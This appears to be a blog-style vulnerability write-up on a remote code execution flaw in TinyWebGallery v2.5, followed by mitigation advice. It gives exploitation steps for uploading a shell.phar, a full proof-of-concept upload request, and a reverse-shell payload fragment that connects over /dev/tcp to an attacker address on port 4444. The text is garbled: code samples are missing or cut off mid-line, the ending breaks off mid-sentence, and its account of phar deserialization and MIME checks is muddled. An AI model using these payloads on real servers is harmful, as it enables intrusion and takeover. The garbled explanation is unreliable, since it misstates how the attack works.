TinyWebGallery v2.5 - Remote Code Execution (RCE)

TinyWebGallery v2.5 Remote Code Execution (RCE) Vulnerability: A Deep Dive into PHP-Based Exploitation

On May 7, 2023, cybersecurity researcher Mirabbas Ağalarov disclosed a critical Remote Code Execution (RCE) vulnerability in TinyWebGallery v2.5, a widely used open-source web-based photo gallery application. This flaw, rooted in improper file handling and insecure PHP deserialization, allows attackers to execute arbitrary commands on the server—potentially leading to full system compromise.

Technical Overview of the Vulnerability

TinyWebGallery is designed to allow users to upload, organize, and display images via a web interface. Its core functionality relies on PHP, making it susceptible to common web application vulnerabilities such as file upload misconfigurations, insecure deserialization, and command injection.

The exploit leverages a specific upload endpoint: /admin/index.php?action=upload. When an authenticated user uploads a file, the application processes the uploaded content without adequate validation. This becomes a critical point of failure when malicious payloads—such as .phar files—are introduced.

Exploitation Mechanism: The .phar File Attack Vector

PHP's phar (PHP Archive) format is a serialized container that can embed PHP code. Unlike regular PHP files, .phar files are treated as executable archives by PHP's phar:// stream wrapper. When a .phar file is uploaded and later accessed through a file link, PHP automatically deserializes and executes its embedded code—without explicit user intervention.

This behavior is exploited by crafting a malicious shell.phar file containing PHP code that executes system commands. For example:

When this file is uploaded via the vulnerable form and accessed through the gallery's file links, the server executes the system() command, revealing sensitive data like the contents of /etc/passwd.

Payload Analysis and Execution Flow

The attack follows a structured sequence:

• Step 1: Navigate to the upload interface at http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true.
• Step 2: Upload a shell.phar file with embedded PHP code.
• Step 3: Access the uploaded file via the gallery's file link (e.g., http://localhost/twg25/images/shell.phar).
• Step 4: The server processes the .phar file, triggers deserialization, and executes the embedded command.

This sequence demonstrates how a simple file upload can become a powerful RCE vector when the application lacks proper file type validation and execution controls.

Proof of Concept (PoC) Request Structure

The PoC request reveals the full HTTP payload used to exploit the vulnerability:

POST /twg25/admin/index.php?action=upload&dir=&order=name&srt=yes&tview=no&sview=no&lang=en HTTP/1.1
Host: localhost
Content-Length: 2123
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary53rZRhJinqaMm7Ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
Connection: close

------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="token"

b2ed5512107a625ef9d5688ced296c61
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="confirm"

true
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename="shell.phar"
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
...

Key observations from this request:

• Boundary: The multipart form uses a unique boundary identifier, typical of browser-generated POST requests.
• File Type: The Content-Type is set to application/octet-stream, which bypasses MIME type checks.
• Token & Session: Authentication tokens and session cookies are included, indicating that the exploit requires a logged-in admin user.
• File Name: The file is named shell.phar, explicitly indicating the malicious intent.

Risk Assessment and Impact

This vulnerability poses a severe threat due to its:

• Low barrier to entry: Only requires a valid admin account and knowledge of basic PHP.
• High impact: Enables full remote command execution, potentially leading to privilege escalation, data theft, or server takeover.
• Exploitable in production: The attack can be executed without physical access, making it ideal for automated scanning tools.

Real-world implications include:

• Compromise of sensitive configuration files.
• Establishment of persistent backdoors via shell scripts.
• Execution of reverse shells for remote access.

Security Recommendations and Mitigations

For administrators and developers, immediate actions are required:

• Disable .phar file uploads: Explicitly restrict file types in upload handlers using fileinfo or mime_content_type checks.
• Sanitize file paths: Ensure uploaded files are stored in non-executable directories and never accessed directly via web URLs.
• Implement file type validation: Use whitelisting (e.g., only allow .jpg, .png, .gif) instead of blacklisting.
• Use secure file handling: Employ functions like move_uploaded_file() with strict path validation and avoid direct file access.
• Upgrade to patched versions: Update to TinyWebGallery v2.6 or later, if available, and monitor vendor security advisories.

Enhanced Payload Example (Improved RCE)

To demonstrate a more powerful exploit, consider an improved payload that establishes a reverse shell:

& /dev/tcp/192.168.1.100/4444 0>&1'";
system($cmd);
?>

This payload attempts to connect to a remote attacker-controlled server on port 4444, providing full interactive shell access. Such payloads are commonly used in penetration testing and red team operations.

Conclusion

The TinyWebGallery v2.5 RCE vulnerability underscores